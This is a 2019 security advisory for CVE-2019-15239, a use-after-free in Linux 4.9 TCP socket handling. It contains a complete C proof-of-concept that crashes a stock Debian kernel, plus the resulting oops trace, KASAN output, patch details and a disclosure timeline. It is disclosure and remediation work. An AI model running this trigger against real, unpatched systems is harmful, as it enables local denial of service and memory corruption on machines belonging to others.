Linux Kernel 4.9 - TCP Socket Handling Use-After-Free (CVE-2019-15239)

Aug 14 2019

A use-after-free condition was present in the Linux 4.9 kernel TCP socket handling code, triggerable by a low privilege local user. The included POC triggers multiple read and write UAF conditions. Additionally, the POC causes a kernel crash on a vanilla Debian build.

Date Released: 14/08/2019
Author: Denis Andzakovic
Vendor Website: https://www.debian.org/
Affected Software: Linux Kernel 4.9.168
CVE: CVE-2019-15239

Proof-of-Concept

By adding to a write queue between disconnection and reconnection, multipe use-after-free conditions can be triggered. The following POC can be used to replicate the issue. The POC should be run multiple times over to reliably trigger the condition, for example: for i in {1..1000}; do ./repro; done

#define _GNU_SOURCE

#include <endian.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>

static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void thread_start(void* (*fn)(void*), void* arg)
{
  pthread_t th;
  pthread_attr_t attr;
  pthread_attr_init(&attr);
  pthread_attr_setstacksize(&attr, 128 << 10);
  if (pthread_create(&th, &attr, fn, arg))
    exit(1);
  pthread_attr_destroy(&attr);
}

typedef struct {
  int state;
} event_t;

static void event_init(event_t* ev)
{
  ev->state = 0;
}

static void event_reset(event_t* ev)
{
  ev->state = 0;
}

static void event_set(event_t* ev)
{
  if (ev->state)
    exit(1);
  __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
  syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG);
}

static void event_wait(event_t* ev)
{
  while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
}

static int event_isset(event_t* ev)
{
  return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}

static int event_timedwait(event_t* ev, uint64_t timeout)
{
  uint64_t start = current_time_ms();
  uint64_t now = start;
  for (;;) {
    uint64_t remain = timeout - (now - start);
    struct timespec ts;
    ts.tv_sec = remain / 1000;
    ts.tv_nsec = (remain % 1000) * 1000 * 1000;
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
    if (__atomic_load_n(&ev->state, __ATOMIC_RELAXED))
      return 1;
    now = current_time_ms();
    if (now - start > timeout)
      return 0;
  }
}

struct thread_t {
  int created, call;
  event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
static int running;

static void* thr(void* arg)
{
  struct thread_t* th = (struct thread_t*)arg;
  for (;;) {
    event_wait(&th->ready);
    event_reset(&th->ready);
    execute_call(th->call);
    __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
    event_set(&th->done);
  }
  return 0;
}

static void loop(void)
{
  int i, call, thread;
  for (call = 0; call < 8; call++) {
    for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0]));
         thread++) {
      struct thread_t* th = &threads[thread];
      if (!th->created) {
        th->created = 1;
        event_init(&th->ready);
        event_init(&th->done);
        event_set(&th->done);
        thread_start(thr, th);
      }
      if (!event_isset(&th->done))
        continue;
      event_reset(&th->done);
      th->call = call;
      __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
      event_set(&th->ready);
      event_timedwait(&th->done, 45);
      break;
    }
  }
  for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
    sleep_ms(1);
}

uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

void execute_call(int call)
{
  long res;

  switch (call) {
  case 0:
    res = socket(2, 1, 0);
    if (res != -1)
      r[0] = res;
    break;
  case 1:
    *(uint16_t*)0x20000000 = 2;
    *(uint16_t*)0x20000002 = htobe16(0x4e23);
    *(uint32_t*)0x20000004 = htobe32(0xe0000001);
    bind(r[0], (void *)0x20000000, 0x10);
    break;
  case 2:
    *(uint16_t*)0x20000200 = 2;
    *(uint16_t*)0x20000202 = htobe16(0x4e23);
    *(uint32_t*)0x20000204 = htobe32(0);
    connect(r[0], (void *)0x20000200, 0x1c);
    break;
  case 3:
    res = dup2(r[0], r[0]);
    if (res != -1)
      r[1] = res;
    break;
  case 4:
    *(uint32_t*)0x200002c0 = 0x18;
    *(uint32_t*)0x200002c4 = 0;
    *(uint64_t*)0x200002c8 = 2;
    *(uint32_t*)0x200002d0 = 0;
    *(uint32_t*)0x200002d4 = 0;
    write(r[1], (void *)0x200002c0, 0xfffffc1a);
    break;
  case 5:
    *(uint64_t*)0x20005840 = 0;
    *(uint32_t*)0x20005848 = 0;
    *(uint64_t*)0x20005850 = 0x20005780;
    *(uint64_t*)0x20005780 = 0x20000480;
    *(uint32_t*)0x20000480 = 0x18;
    *(uint16_t*)0x20000484 = 0xfff9;
    *(uint16_t*)0x20000486 = 0x300;
    *(uint32_t*)0x20000488 = 0x70bd27;
    *(uint32_t*)0x2000048c = 0x25dfdbfc;
    *(uint16_t*)0x20000490 = 8;
    *(uint16_t*)0x20000492 = 0x72;
    *(uint32_t*)0x20000494 = 0;
    *(uint64_t*)0x20005788 = 0x18;
    *(uint64_t*)0x20005790 = 0;
    *(uint64_t*)0x20005798 = 0;
    *(uint64_t*)0x200057a0 = 0;
    *(uint64_t*)0x200057a8 = 0;
    *(uint64_t*)0x200057b0 = 0;
    *(uint64_t*)0x200057b8 = 0;
    *(uint64_t*)0x200057c0 = 0;
    *(uint64_t*)0x200057c8 = 0;
    *(uint64_t*)0x200057d0 = 0;
    *(uint64_t*)0x200057d8 = 0;
    *(uint64_t*)0x200057e0 = 0;
    *(uint64_t*)0x200057e8 = 0;
    *(uint64_t*)0x20005858 = 7;
    *(uint64_t*)0x20005860 = 0;
    *(uint64_t*)0x20005868 = 0;
    *(uint32_t*)0x20005870 = 0x40000;
    sendmsg(r[1], (void *)0x20005840, 1);
    break;
  case 6:
    *(uint16_t*)0x20000180 = 0;
    memcpy(
        (void*)0x20000182,
        "./"
        "file0\x00",
        6);
    connect(r[1], (void *)0x20000180, 0x8);
    break;
  case 7:
    *(uint16_t*)0x20000140 = 2;
    *(uint16_t*)0x20000142 = htobe16(0x4e23);
    *(uint32_t*)0x20000144 = htobe32(0x7f000001);
    connect(r[0], (void *)0x20000140, 0x10);
    break;
  }
}
int main(void)
{
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  printf("My process ID : %d\n", getpid());
  loop();
  return 0;
}

A successful run of the POC above produces the following kernel crash:

[   65.706537] BUG: unable to handle kernel NULL pointer dereference at 0000000000000008
[   65.707195] IP: [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.707804] PGD 0

[   65.708434] Oops: 0002 [#1] SMP
[   65.709079] Modules linked in: iptable_filter fuse crct10dif_pclmul crc32_pclmul vmw_balloon ghash_clmulni_intel joydev serio_raw pcspkr vmw_vmci snd_ens1371 snd_ac97_codec ac97_bus gameport snd_rawmidi snd_seq_device snd_pcm snd_timer snd soundcore shpchp evdev vmwgfx ttm drm_kms_helper drm sg ac button btusb btrtl btbcm btintel bluetooth rfkill ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sr_mod cdrom sd_mod ata_generic hid_generic usbhid hid crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd psmouse ata_piix ehci_pci e1000 uhci_hcd ehci_hcd usbcore usb_common mptspi scsi_transport_spi mptscsih mptbase i2c_piix4 libata scsi_mod
[   65.714663] CPU: 0 PID: 612 Comm: repro Not tainted 4.9.0-9-amd64 #1 Debian 4.9.168-1
[   65.715408] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/19/2017
[   65.716911] task: ffff880016bc90c0 task.stack: ffffc90000974000
[   65.717645] RIP: 0010:[<ffffffff815702c1>]  [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.718405] RSP: 0018:ffffc90000977b68  EFLAGS: 00010286
[   65.719996] RAX: 0000000000000000 RBX: ffff8800197ec600 RCX: 0000000000000001
[   65.722660] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[   65.727010] RBP: ffff8800197ec800 R08: 000000000000ffd7 R09: 0000000000000002
[   65.727756] R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000
[   65.728507] R13: ffff880013771040 R14: 0000000000007fff R15: 0000000000007fff
[   65.729243] FS:  0000000000000000(0000) GS:ffff88001ba00000(0000) knlGS:0000000000000000
[   65.729939] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   65.730554] CR2: 0000000000000008 CR3: 0000000001c08000 CR4: 0000000000360670
[   65.731224] Stack:
[   65.731852]  0000000000000000 0000000000007fff ffff8800197ec600 0000000000000001
[   65.732469]  0000000000000000 ffff880013771040 ffffffff81571a66 ffff880013771170
[   65.733098]  0000000002080020 0000000000000002 00007ffe00000001 0000000000000000
[   65.733719] Call Trace:
[   65.734351]  [<ffffffff81571a66>] ? tcp_write_xmit+0x676/0xfc0
[   65.734967]  [<ffffffff815723dd>] ? __tcp_push_pending_frames+0x2d/0xd0
[   65.735526]  [<ffffffff81564bae>] ? tcp_close+0x3fe/0x450
[   65.736093]  [<ffffffff8158e58c>] ? inet_release+0x3c/0x60
[   65.736637]  [<ffffffff814f2800>] ? sock_release+0x20/0x80
[   65.737208]  [<ffffffff814f286e>] ? sock_close+0xe/0x20
[   65.737741]  [<ffffffff8120dc48>] ? __fput+0xd8/0x220
[   65.738280]  [<ffffffff81098d5f>] ? task_work_run+0x7f/0xa0
[   65.738847]  [<ffffffff8107ed64>] ? do_exit+0x2d4/0xb60
[   65.739403]  [<ffffffff814f8003>] ? release_sock+0x43/0x90
[   65.739994]  [<ffffffff8156408f>] ? tcp_sendmsg+0x65f/0xc40
[   65.740504]  [<ffffffff8107f66a>] ? do_group_exit+0x3a/0xa0
[   65.741131]  [<ffffffff8108a5fc>] ? get_signal+0x15c/0x7f0
[   65.741676]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.742209]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.742652]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.743265]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.743726]  [<ffffffff81026456>] ? do_signal+0x36/0x6a0
[   65.744135]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.744520]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.744952]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.745336]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.745666]  [<ffffffff8102568f>] ? __switch_to+0x1ef/0x660
[   65.746061]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.746367]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.746683]  [<ffffffff81615aa1>] ? __schedule+0x241/0x6f0
[   65.747035]  [<ffffffff8120bb74>] ? vfs_write+0x144/0x190
[   65.747349]  [<ffffffff81003721>] ? exit_to_usermode_loop+0x71/0xb0
[   65.747654]  [<ffffffff81003bcd>] ? do_syscall_64+0xdd/0xf0
[   65.748012]  [<ffffffff8161a84e>] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
[   65.748310] Code: 00 00 8b 85 cc 00 00 00 80 8d 8e 00 00 00 02 48 03 85 d0 00 00 00 c7 40 20 01 00 01 00 48 8b 03 48 89 5d 08 48 89 45 00 48 89 2b <48> 89 68 08 41 83 85 40 01 00 00 01 31 c0 5b 5d 41 5c 41 5d 41
[   65.749362] RIP  [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.749672]  RSP <ffffc90000977b68>
[   65.750076] CR2: 0000000000000008
[   65.750374] ---[ end trace 7d15bf5730d84780 ]---
[   65.750670] Fixing recursive fault but reboot is needed!

Additionally, the POC produced the following KASAN output. Note, all of the following lines stem from a single successful execution of the POC.

BUG: KASAN: use-after-free in ip_queue_xmit+0x50b/0x750 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x1b/0x80 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x3b/0x80 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x4e/0x80 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x9f/0x750 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xba/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xdd/0x750 at addr ffff8801eb449bac - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x118/0x750 at addr ffff8801f46be37c - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3e6/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3fd/0x750 at addr ffff8801f46be382 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x180/0x750 at addr ffff8801f46be384 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1aa/0x750 at addr ffff8801f46be385 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1da/0x750 at addr ffff8801f46be388 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x20b/0x750 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x21c/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x22f/0x750 at addr ffff8801f46be944 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x24a/0x750 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x25e/0x750 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x272/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2b5/0x750 at addr ffff8801f46be380 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2f8/0x750 at addr ffff8801eb449b84 - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x31e/0x750 at addr ffff8801eb449b9c - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x79/0x270 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x8d/0x270 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xa0/0x270 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xb2/0x270 at addr ffff8801f46be37e - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x12/0x60 at addr ffff8801f46be386 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x20/0x60 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xce/0x270 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x116/0x270 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_local_out+0x27/0x60 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0x76/0x1c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xb2/0x1c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xc7/0x1c0 at addr ffff8801eb449b08 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xd7/0x1c0 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xec/0x1c0 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x25/0x310 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x206/0x310 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0xf7/0x310 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x109/0x310 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x119/0x310 at addr ffff8801f46be942 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x130/0x310 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x25/0xf0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x38/0xf0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x48/0xf0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x5a/0xf0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xaa/0x7c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xd7/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xf3/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x117/0x7c0 at addr ffff8801eb449bb0 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x13b/0x7c0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x173/0x7c0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x1d9/0x7c0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x6b4/0x7c0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x360/0x7c0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_options_echo+0x33/0x670 at addr ffff8801eb449b1c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x573/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x585/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x598/0x7c0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x5f1/0x7c0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x2cb/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x14d/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x18e/0x5a0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1a4/0x5a0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1bc/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1cc/0x5a0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x28/0x7b0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x3e/0x7b0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x52/0x7b0 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x67/0x7b0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xc5/0x7b0 at addr ffff8801eb449b9c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xf5/0x7b0 at addr ffff8801eb449b88 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x116/0x7b0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x13a/0x7b0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x4c1/0x7b0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x684/0x7b0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x699/0x7b0 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x502/0x7b0 at addr ffff8801f46be392 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x523/0x7b0 at addr ffff8801f46be390 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x1ed/0x7b0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x207/0x7b0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x288/0x7b0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x35a/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x738/0x7c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x2d/0x400 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x40/0x400 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x6e/0x400 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in nf_ct_attach+0x16/0x40 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skb+0x23/0xd0 at addr ffff8801eb449bcc - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x16/0xf0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x31/0xf0 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x42/0xf0 at addr ffff8801eb449b50 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x61/0xf0 at addr ffff8801eb449b48 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x17/0xe0 at addr ffff8801eb449b00 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x27/0xe0 at addr ffff8801eb449bc8 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x8a/0xf0 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0xa6/0xf0 at addr ffff8801eb449b60 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_all+0x1a/0x30 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x1a/0x140 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x2d/0x140 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x40/0x140 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skbmem+0x15/0x80 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_init_tso_segs+0x1e/0xc0 at addr ffff8801eb449a30 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_write_xmit+0x51b/0x1d50 at addr ffff8801eb449a34 - Read of size 1 by task rep/29723

Recommendation

This bug was introduced by backports of commit 7f582b248d0a (“tcp: purge write queue in tcp_connect_init()”). Apply security updates included with DSA 4497-1.

The vulnerability has been addressed in Debian 3.16.72-1, 4.9.168-1+deb9u5~deb8u1 and 4.9.168-1+deb9u5.

The fix should be included in the upcoming stable releases:

  • 3.16.73
  • 4.4.190
  • 4.9.190
  • 4.14.139

Timeline

21/05/2019 - Initial email to Debian security team
26/05/2019 - Debian security team identified a potential patch
06/08/2019 - Patch file recieved from Debian, confirming a fix
14/08/2019 - Advisory released